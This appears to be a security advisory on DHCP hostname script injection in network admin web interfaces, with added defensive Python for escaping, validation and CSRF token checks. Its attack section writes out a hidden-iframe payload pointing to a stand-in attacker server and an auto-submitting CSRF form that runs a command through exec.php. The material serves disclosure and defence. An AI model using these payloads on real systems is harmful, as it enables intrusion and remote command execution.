DHCP Script Injection
A number of administrative applications are available which allow users to manage a network DHCP server via a web interface. This allows administrators to set up configuration options and view active DHCP leases.
It was found that a large number of these administrative web applications did not properly sanitise parameters that were passed to them from the DHCP server, and therefore, ultimately, from an attacker-controlled DHCP client. In particular, a specially crafted DHCPREQUEST message containing malicious JavaScript or HTML code in the DHCP Options Hostname field could be sent to the DHCP server; the malicious code would then be displayed in the DHCP active leases page of the vulnerable administrative application and would be executed when an administrator visited the page.
Circumstances
Device providing an administrative web interface with a DHCP management functionality.
Cause
The device administrative web interface does not properly sanitise parameters that are passed to it from the DHCP server.
Exploitation
If a specially crafted DHCPREQUEST message containing malicious code in the Hostname DHCP Options field is sent to the affected DHCP server, the code will be displayed in the DHCP active leases page of the device administrative interface and will be executed when an administrator visits this page.
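The root cause is that the hostname a client supplies in DHCP option 12 is treated as trusted data and written straight into the leases page. The following is an added example, not code from the page or from any of the affected products: it parses the options area of a constructed DHCP message, extracts option 12, and renders a lease table row two ways, the vulnerable way (raw concatenation) and the hardened way (validate the hostname against RFC 1123 label syntax at ingest, HTML-escape at output). The packet layout, the `build_dhcp_packet` helper and the row format are assumptions made for the example.

```python
import html
import re

# Assumed for the example: RFC 1123 label syntax (letters, digits, hyphens;
# no leading or trailing hyphen; 1-63 characters per label).
_LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

DHCP_MAGIC_COOKIE = b"\x63\x82\x53\x63"   # RFC 2132 magic cookie
OPTION_PAD = 0
OPTION_HOSTNAME = 12                      # "Host Name" option
OPTION_END = 255
BOOTP_HEADER_LEN = 236                    # fixed BOOTP header before the cookie


def parse_dhcp_options(packet: bytes) -> dict:
    """Parse the TLV options that follow the BOOTP header and magic cookie.

    Returns {option_code: raw_value}. Raises ValueError on malformed input so a
    truncated or non-DHCP message never reaches the renderer.
    """
    if len(packet) < BOOTP_HEADER_LEN + 4:
        raise ValueError("message shorter than a BOOTP header plus cookie")
    if packet[BOOTP_HEADER_LEN:BOOTP_HEADER_LEN + 4] != DHCP_MAGIC_COOKIE:
        raise ValueError("missing DHCP magic cookie")
    options = {}
    i = BOOTP_HEADER_LEN + 4
    while i < len(packet):
        code = packet[i]
        if code == OPTION_PAD:
            i += 1
            continue
        if code == OPTION_END:
            break
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        value = packet[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        options[code] = value
        i += 2 + length
    return options


def build_dhcp_packet(hostname: bytes) -> bytes:
    """Constructed sample: a minimal BOOTREQUEST carrying only a hostname option."""
    header = bytearray(BOOTP_HEADER_LEN)
    header[0] = 1   # op    = BOOTREQUEST
    header[1] = 1   # htype = Ethernet
    header[2] = 6   # hlen  = 6-byte MAC
    return (bytes(header) + DHCP_MAGIC_COOKIE
            + bytes([OPTION_HOSTNAME, len(hostname)]) + hostname
            + bytes([OPTION_END]))


def is_valid_hostname(name: str) -> bool:
    """Accept only hostnames that match RFC 1123 label syntax."""
    if not name or len(name) > 253:
        return False
    return all(_LABEL_RE.match(label) for label in name.split("."))


def render_lease_row_unsafe(hostname: str, ip: str) -> str:
    # The vulnerable pattern: client-supplied text concatenated into markup.
    return f"<tr><td>{ip}</td><td>{hostname}</td></tr>"


def render_lease_row_safe(hostname: str, ip: str) -> str:
    # Defence in depth: reject anything that is not a hostname, then escape
    # whatever is shown so the browser can only ever treat it as text.
    shown = hostname if is_valid_hostname(hostname) else "(invalid hostname)"
    return f"<tr><td>{html.escape(ip)}</td><td>{html.escape(shown, quote=True)}</td></tr>"


def lease_row_from_packet(packet: bytes, ip: str, safe: bool = True) -> str:
    """Extract option 12 from a DHCP message and render one leases-page row."""
    raw = parse_dhcp_options(packet).get(OPTION_HOSTNAME, b"")
    hostname = raw.decode("ascii", errors="replace")
    renderer = render_lease_row_safe if safe else render_lease_row_unsafe
    return renderer(hostname, ip)


if __name__ == "__main__":
    sample = build_dhcp_packet(b"<iframe src=x>")   # constructed hostile hostname
    print(lease_row_from_packet(sample, "10.0.0.5", safe=False))
    print(lease_row_from_packet(sample, "10.0.0.5", safe=True))
```

Validation at ingest is the check that stops the payload from ever being stored in the lease database; output escaping is the check that protects the page even if a future code path stores the raw value anyway. Both are needed, because the leases page is not the only place a hostname may later be rendered.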
Impact
Administrative web interfaces normally have highly privileged access to operating system functions via built-in scripts. In combination with a CSRF technique, an attacker could remotely execute commands on the affected system.
Dependencies
- The attacker would have to be connected to the network segment on which the affected device was located.
- The DHCP server would also need to be active and to provide the attacker’s system with an IP address.
Attack Technique
1. An attacker connected to the same wired network as the affected device could send a specially crafted DHCPREQUEST message containing a malicious payload in the DHCP Options Hostname field, for example:
<iframe height=0 width=0 src='http://attacker-web-server/'>
2. This payload would then be passed from the DHCP server to the admin web interface and executed when the DHCP active leases page was visited by an administrator.
3. The malicious payload in the DHCP Options Hostname field references a script hosted on the attacker's web server. Below is an example of the malicious script hosted on the attacker's web server. This code will vary depending on the affected device.
<html>
<body onload="javascript:document.forms.frmExecPlus.submit();">
<form name="frmExecPlus" action="https://target/exec.php" method="POST">
<input name="txtCommand" type="hidden" size="80" value="whoami">
<input type="hidden" value="Execute">
</form>
</body>
</html>
4. The malicious script hosted on the attacker's web server is used to perform a CSRF attack against the affected administrative interface. This script causes the administrator's browser to make a POST request to the command execution functionality (exec.php), which executes the desired command.
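Step 4 only works because the command execution endpoint accepts any POST that arrives with the administrator's session cookie. The following is an added example, not code from the page or from any affected product: a hypothetical server-side handler for such an endpoint that rejects the forged request with two independent checks, an Origin/Referer comparison against the interface's own origin and a per-session synchronizer token compared in constant time. The handler, parameter names and the `allowed_origin` value are assumptions made for the example; it returns the command it would accept and never executes anything.

```python
import hmac
import secrets


class CsrfError(Exception):
    """Raised when a state-changing request fails the CSRF checks."""


def issue_csrf_token(session: dict) -> str:
    """Create a fresh synchronizer token, store it server-side and return it.

    The admin page embeds this value in its own forms; an attacker's page on
    another origin cannot read it.
    """
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _origin_allowed(headers: dict, allowed_origin: str) -> bool:
    # Browsers attach Origin (or at least Referer) to cross-site form posts.
    # Exact-match the scheme+host so "https://target.evil" is not accepted.
    origin = headers.get("Origin")
    if origin is not None:
        return origin == allowed_origin
    referer = headers.get("Referer", "")
    return referer == allowed_origin or referer.startswith(allowed_origin + "/")


def check_csrf(session: dict, form: dict, headers: dict, allowed_origin: str) -> None:
    """Apply both defences; raise CsrfError if either fails."""
    if not _origin_allowed(headers, allowed_origin):
        raise CsrfError("cross-origin request rejected")
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    # compare_digest avoids leaking the token byte-by-byte through timing.
    if not expected or not hmac.compare_digest(expected, supplied):
        raise CsrfError("missing or invalid CSRF token")


def handle_exec(session: dict, form: dict, headers: dict,
                allowed_origin: str = "https://target") -> str:
    """Hypothetical protected replacement for an exec.php-style handler.

    Returns the command that passed the checks; execution is deliberately
    left out of the example.
    """
    check_csrf(session, form, headers, allowed_origin)
    return form["txtCommand"]


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    # Legitimate submission from the admin interface's own form (constructed).
    print(handle_exec(session,
                      {"txtCommand": "whoami", "csrf_token": token},
                      {"Origin": "https://target"}))
    # Forged submission as in step 4: wrong origin and no token (constructed).
    try:
        handle_exec(session, {"txtCommand": "whoami"},
                    {"Origin": "http://attacker-web-server"})
    except CsrfError as err:
        print("blocked:", err)
```

Setting the session cookie with `SameSite=Strict` adds a third, browser-enforced layer: the forged POST from the attacker's origin would then be sent without the administrator's cookie at all. The token check remains the primary control because it does not depend on the browser's cookie policy.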
Tool: DHCP Script Injection
Advisory: pfSense DHCP Script Injection Vulnerability
Demo: pfSense DHCP Script Injection Attack
White paper: Behind Enemy Lines
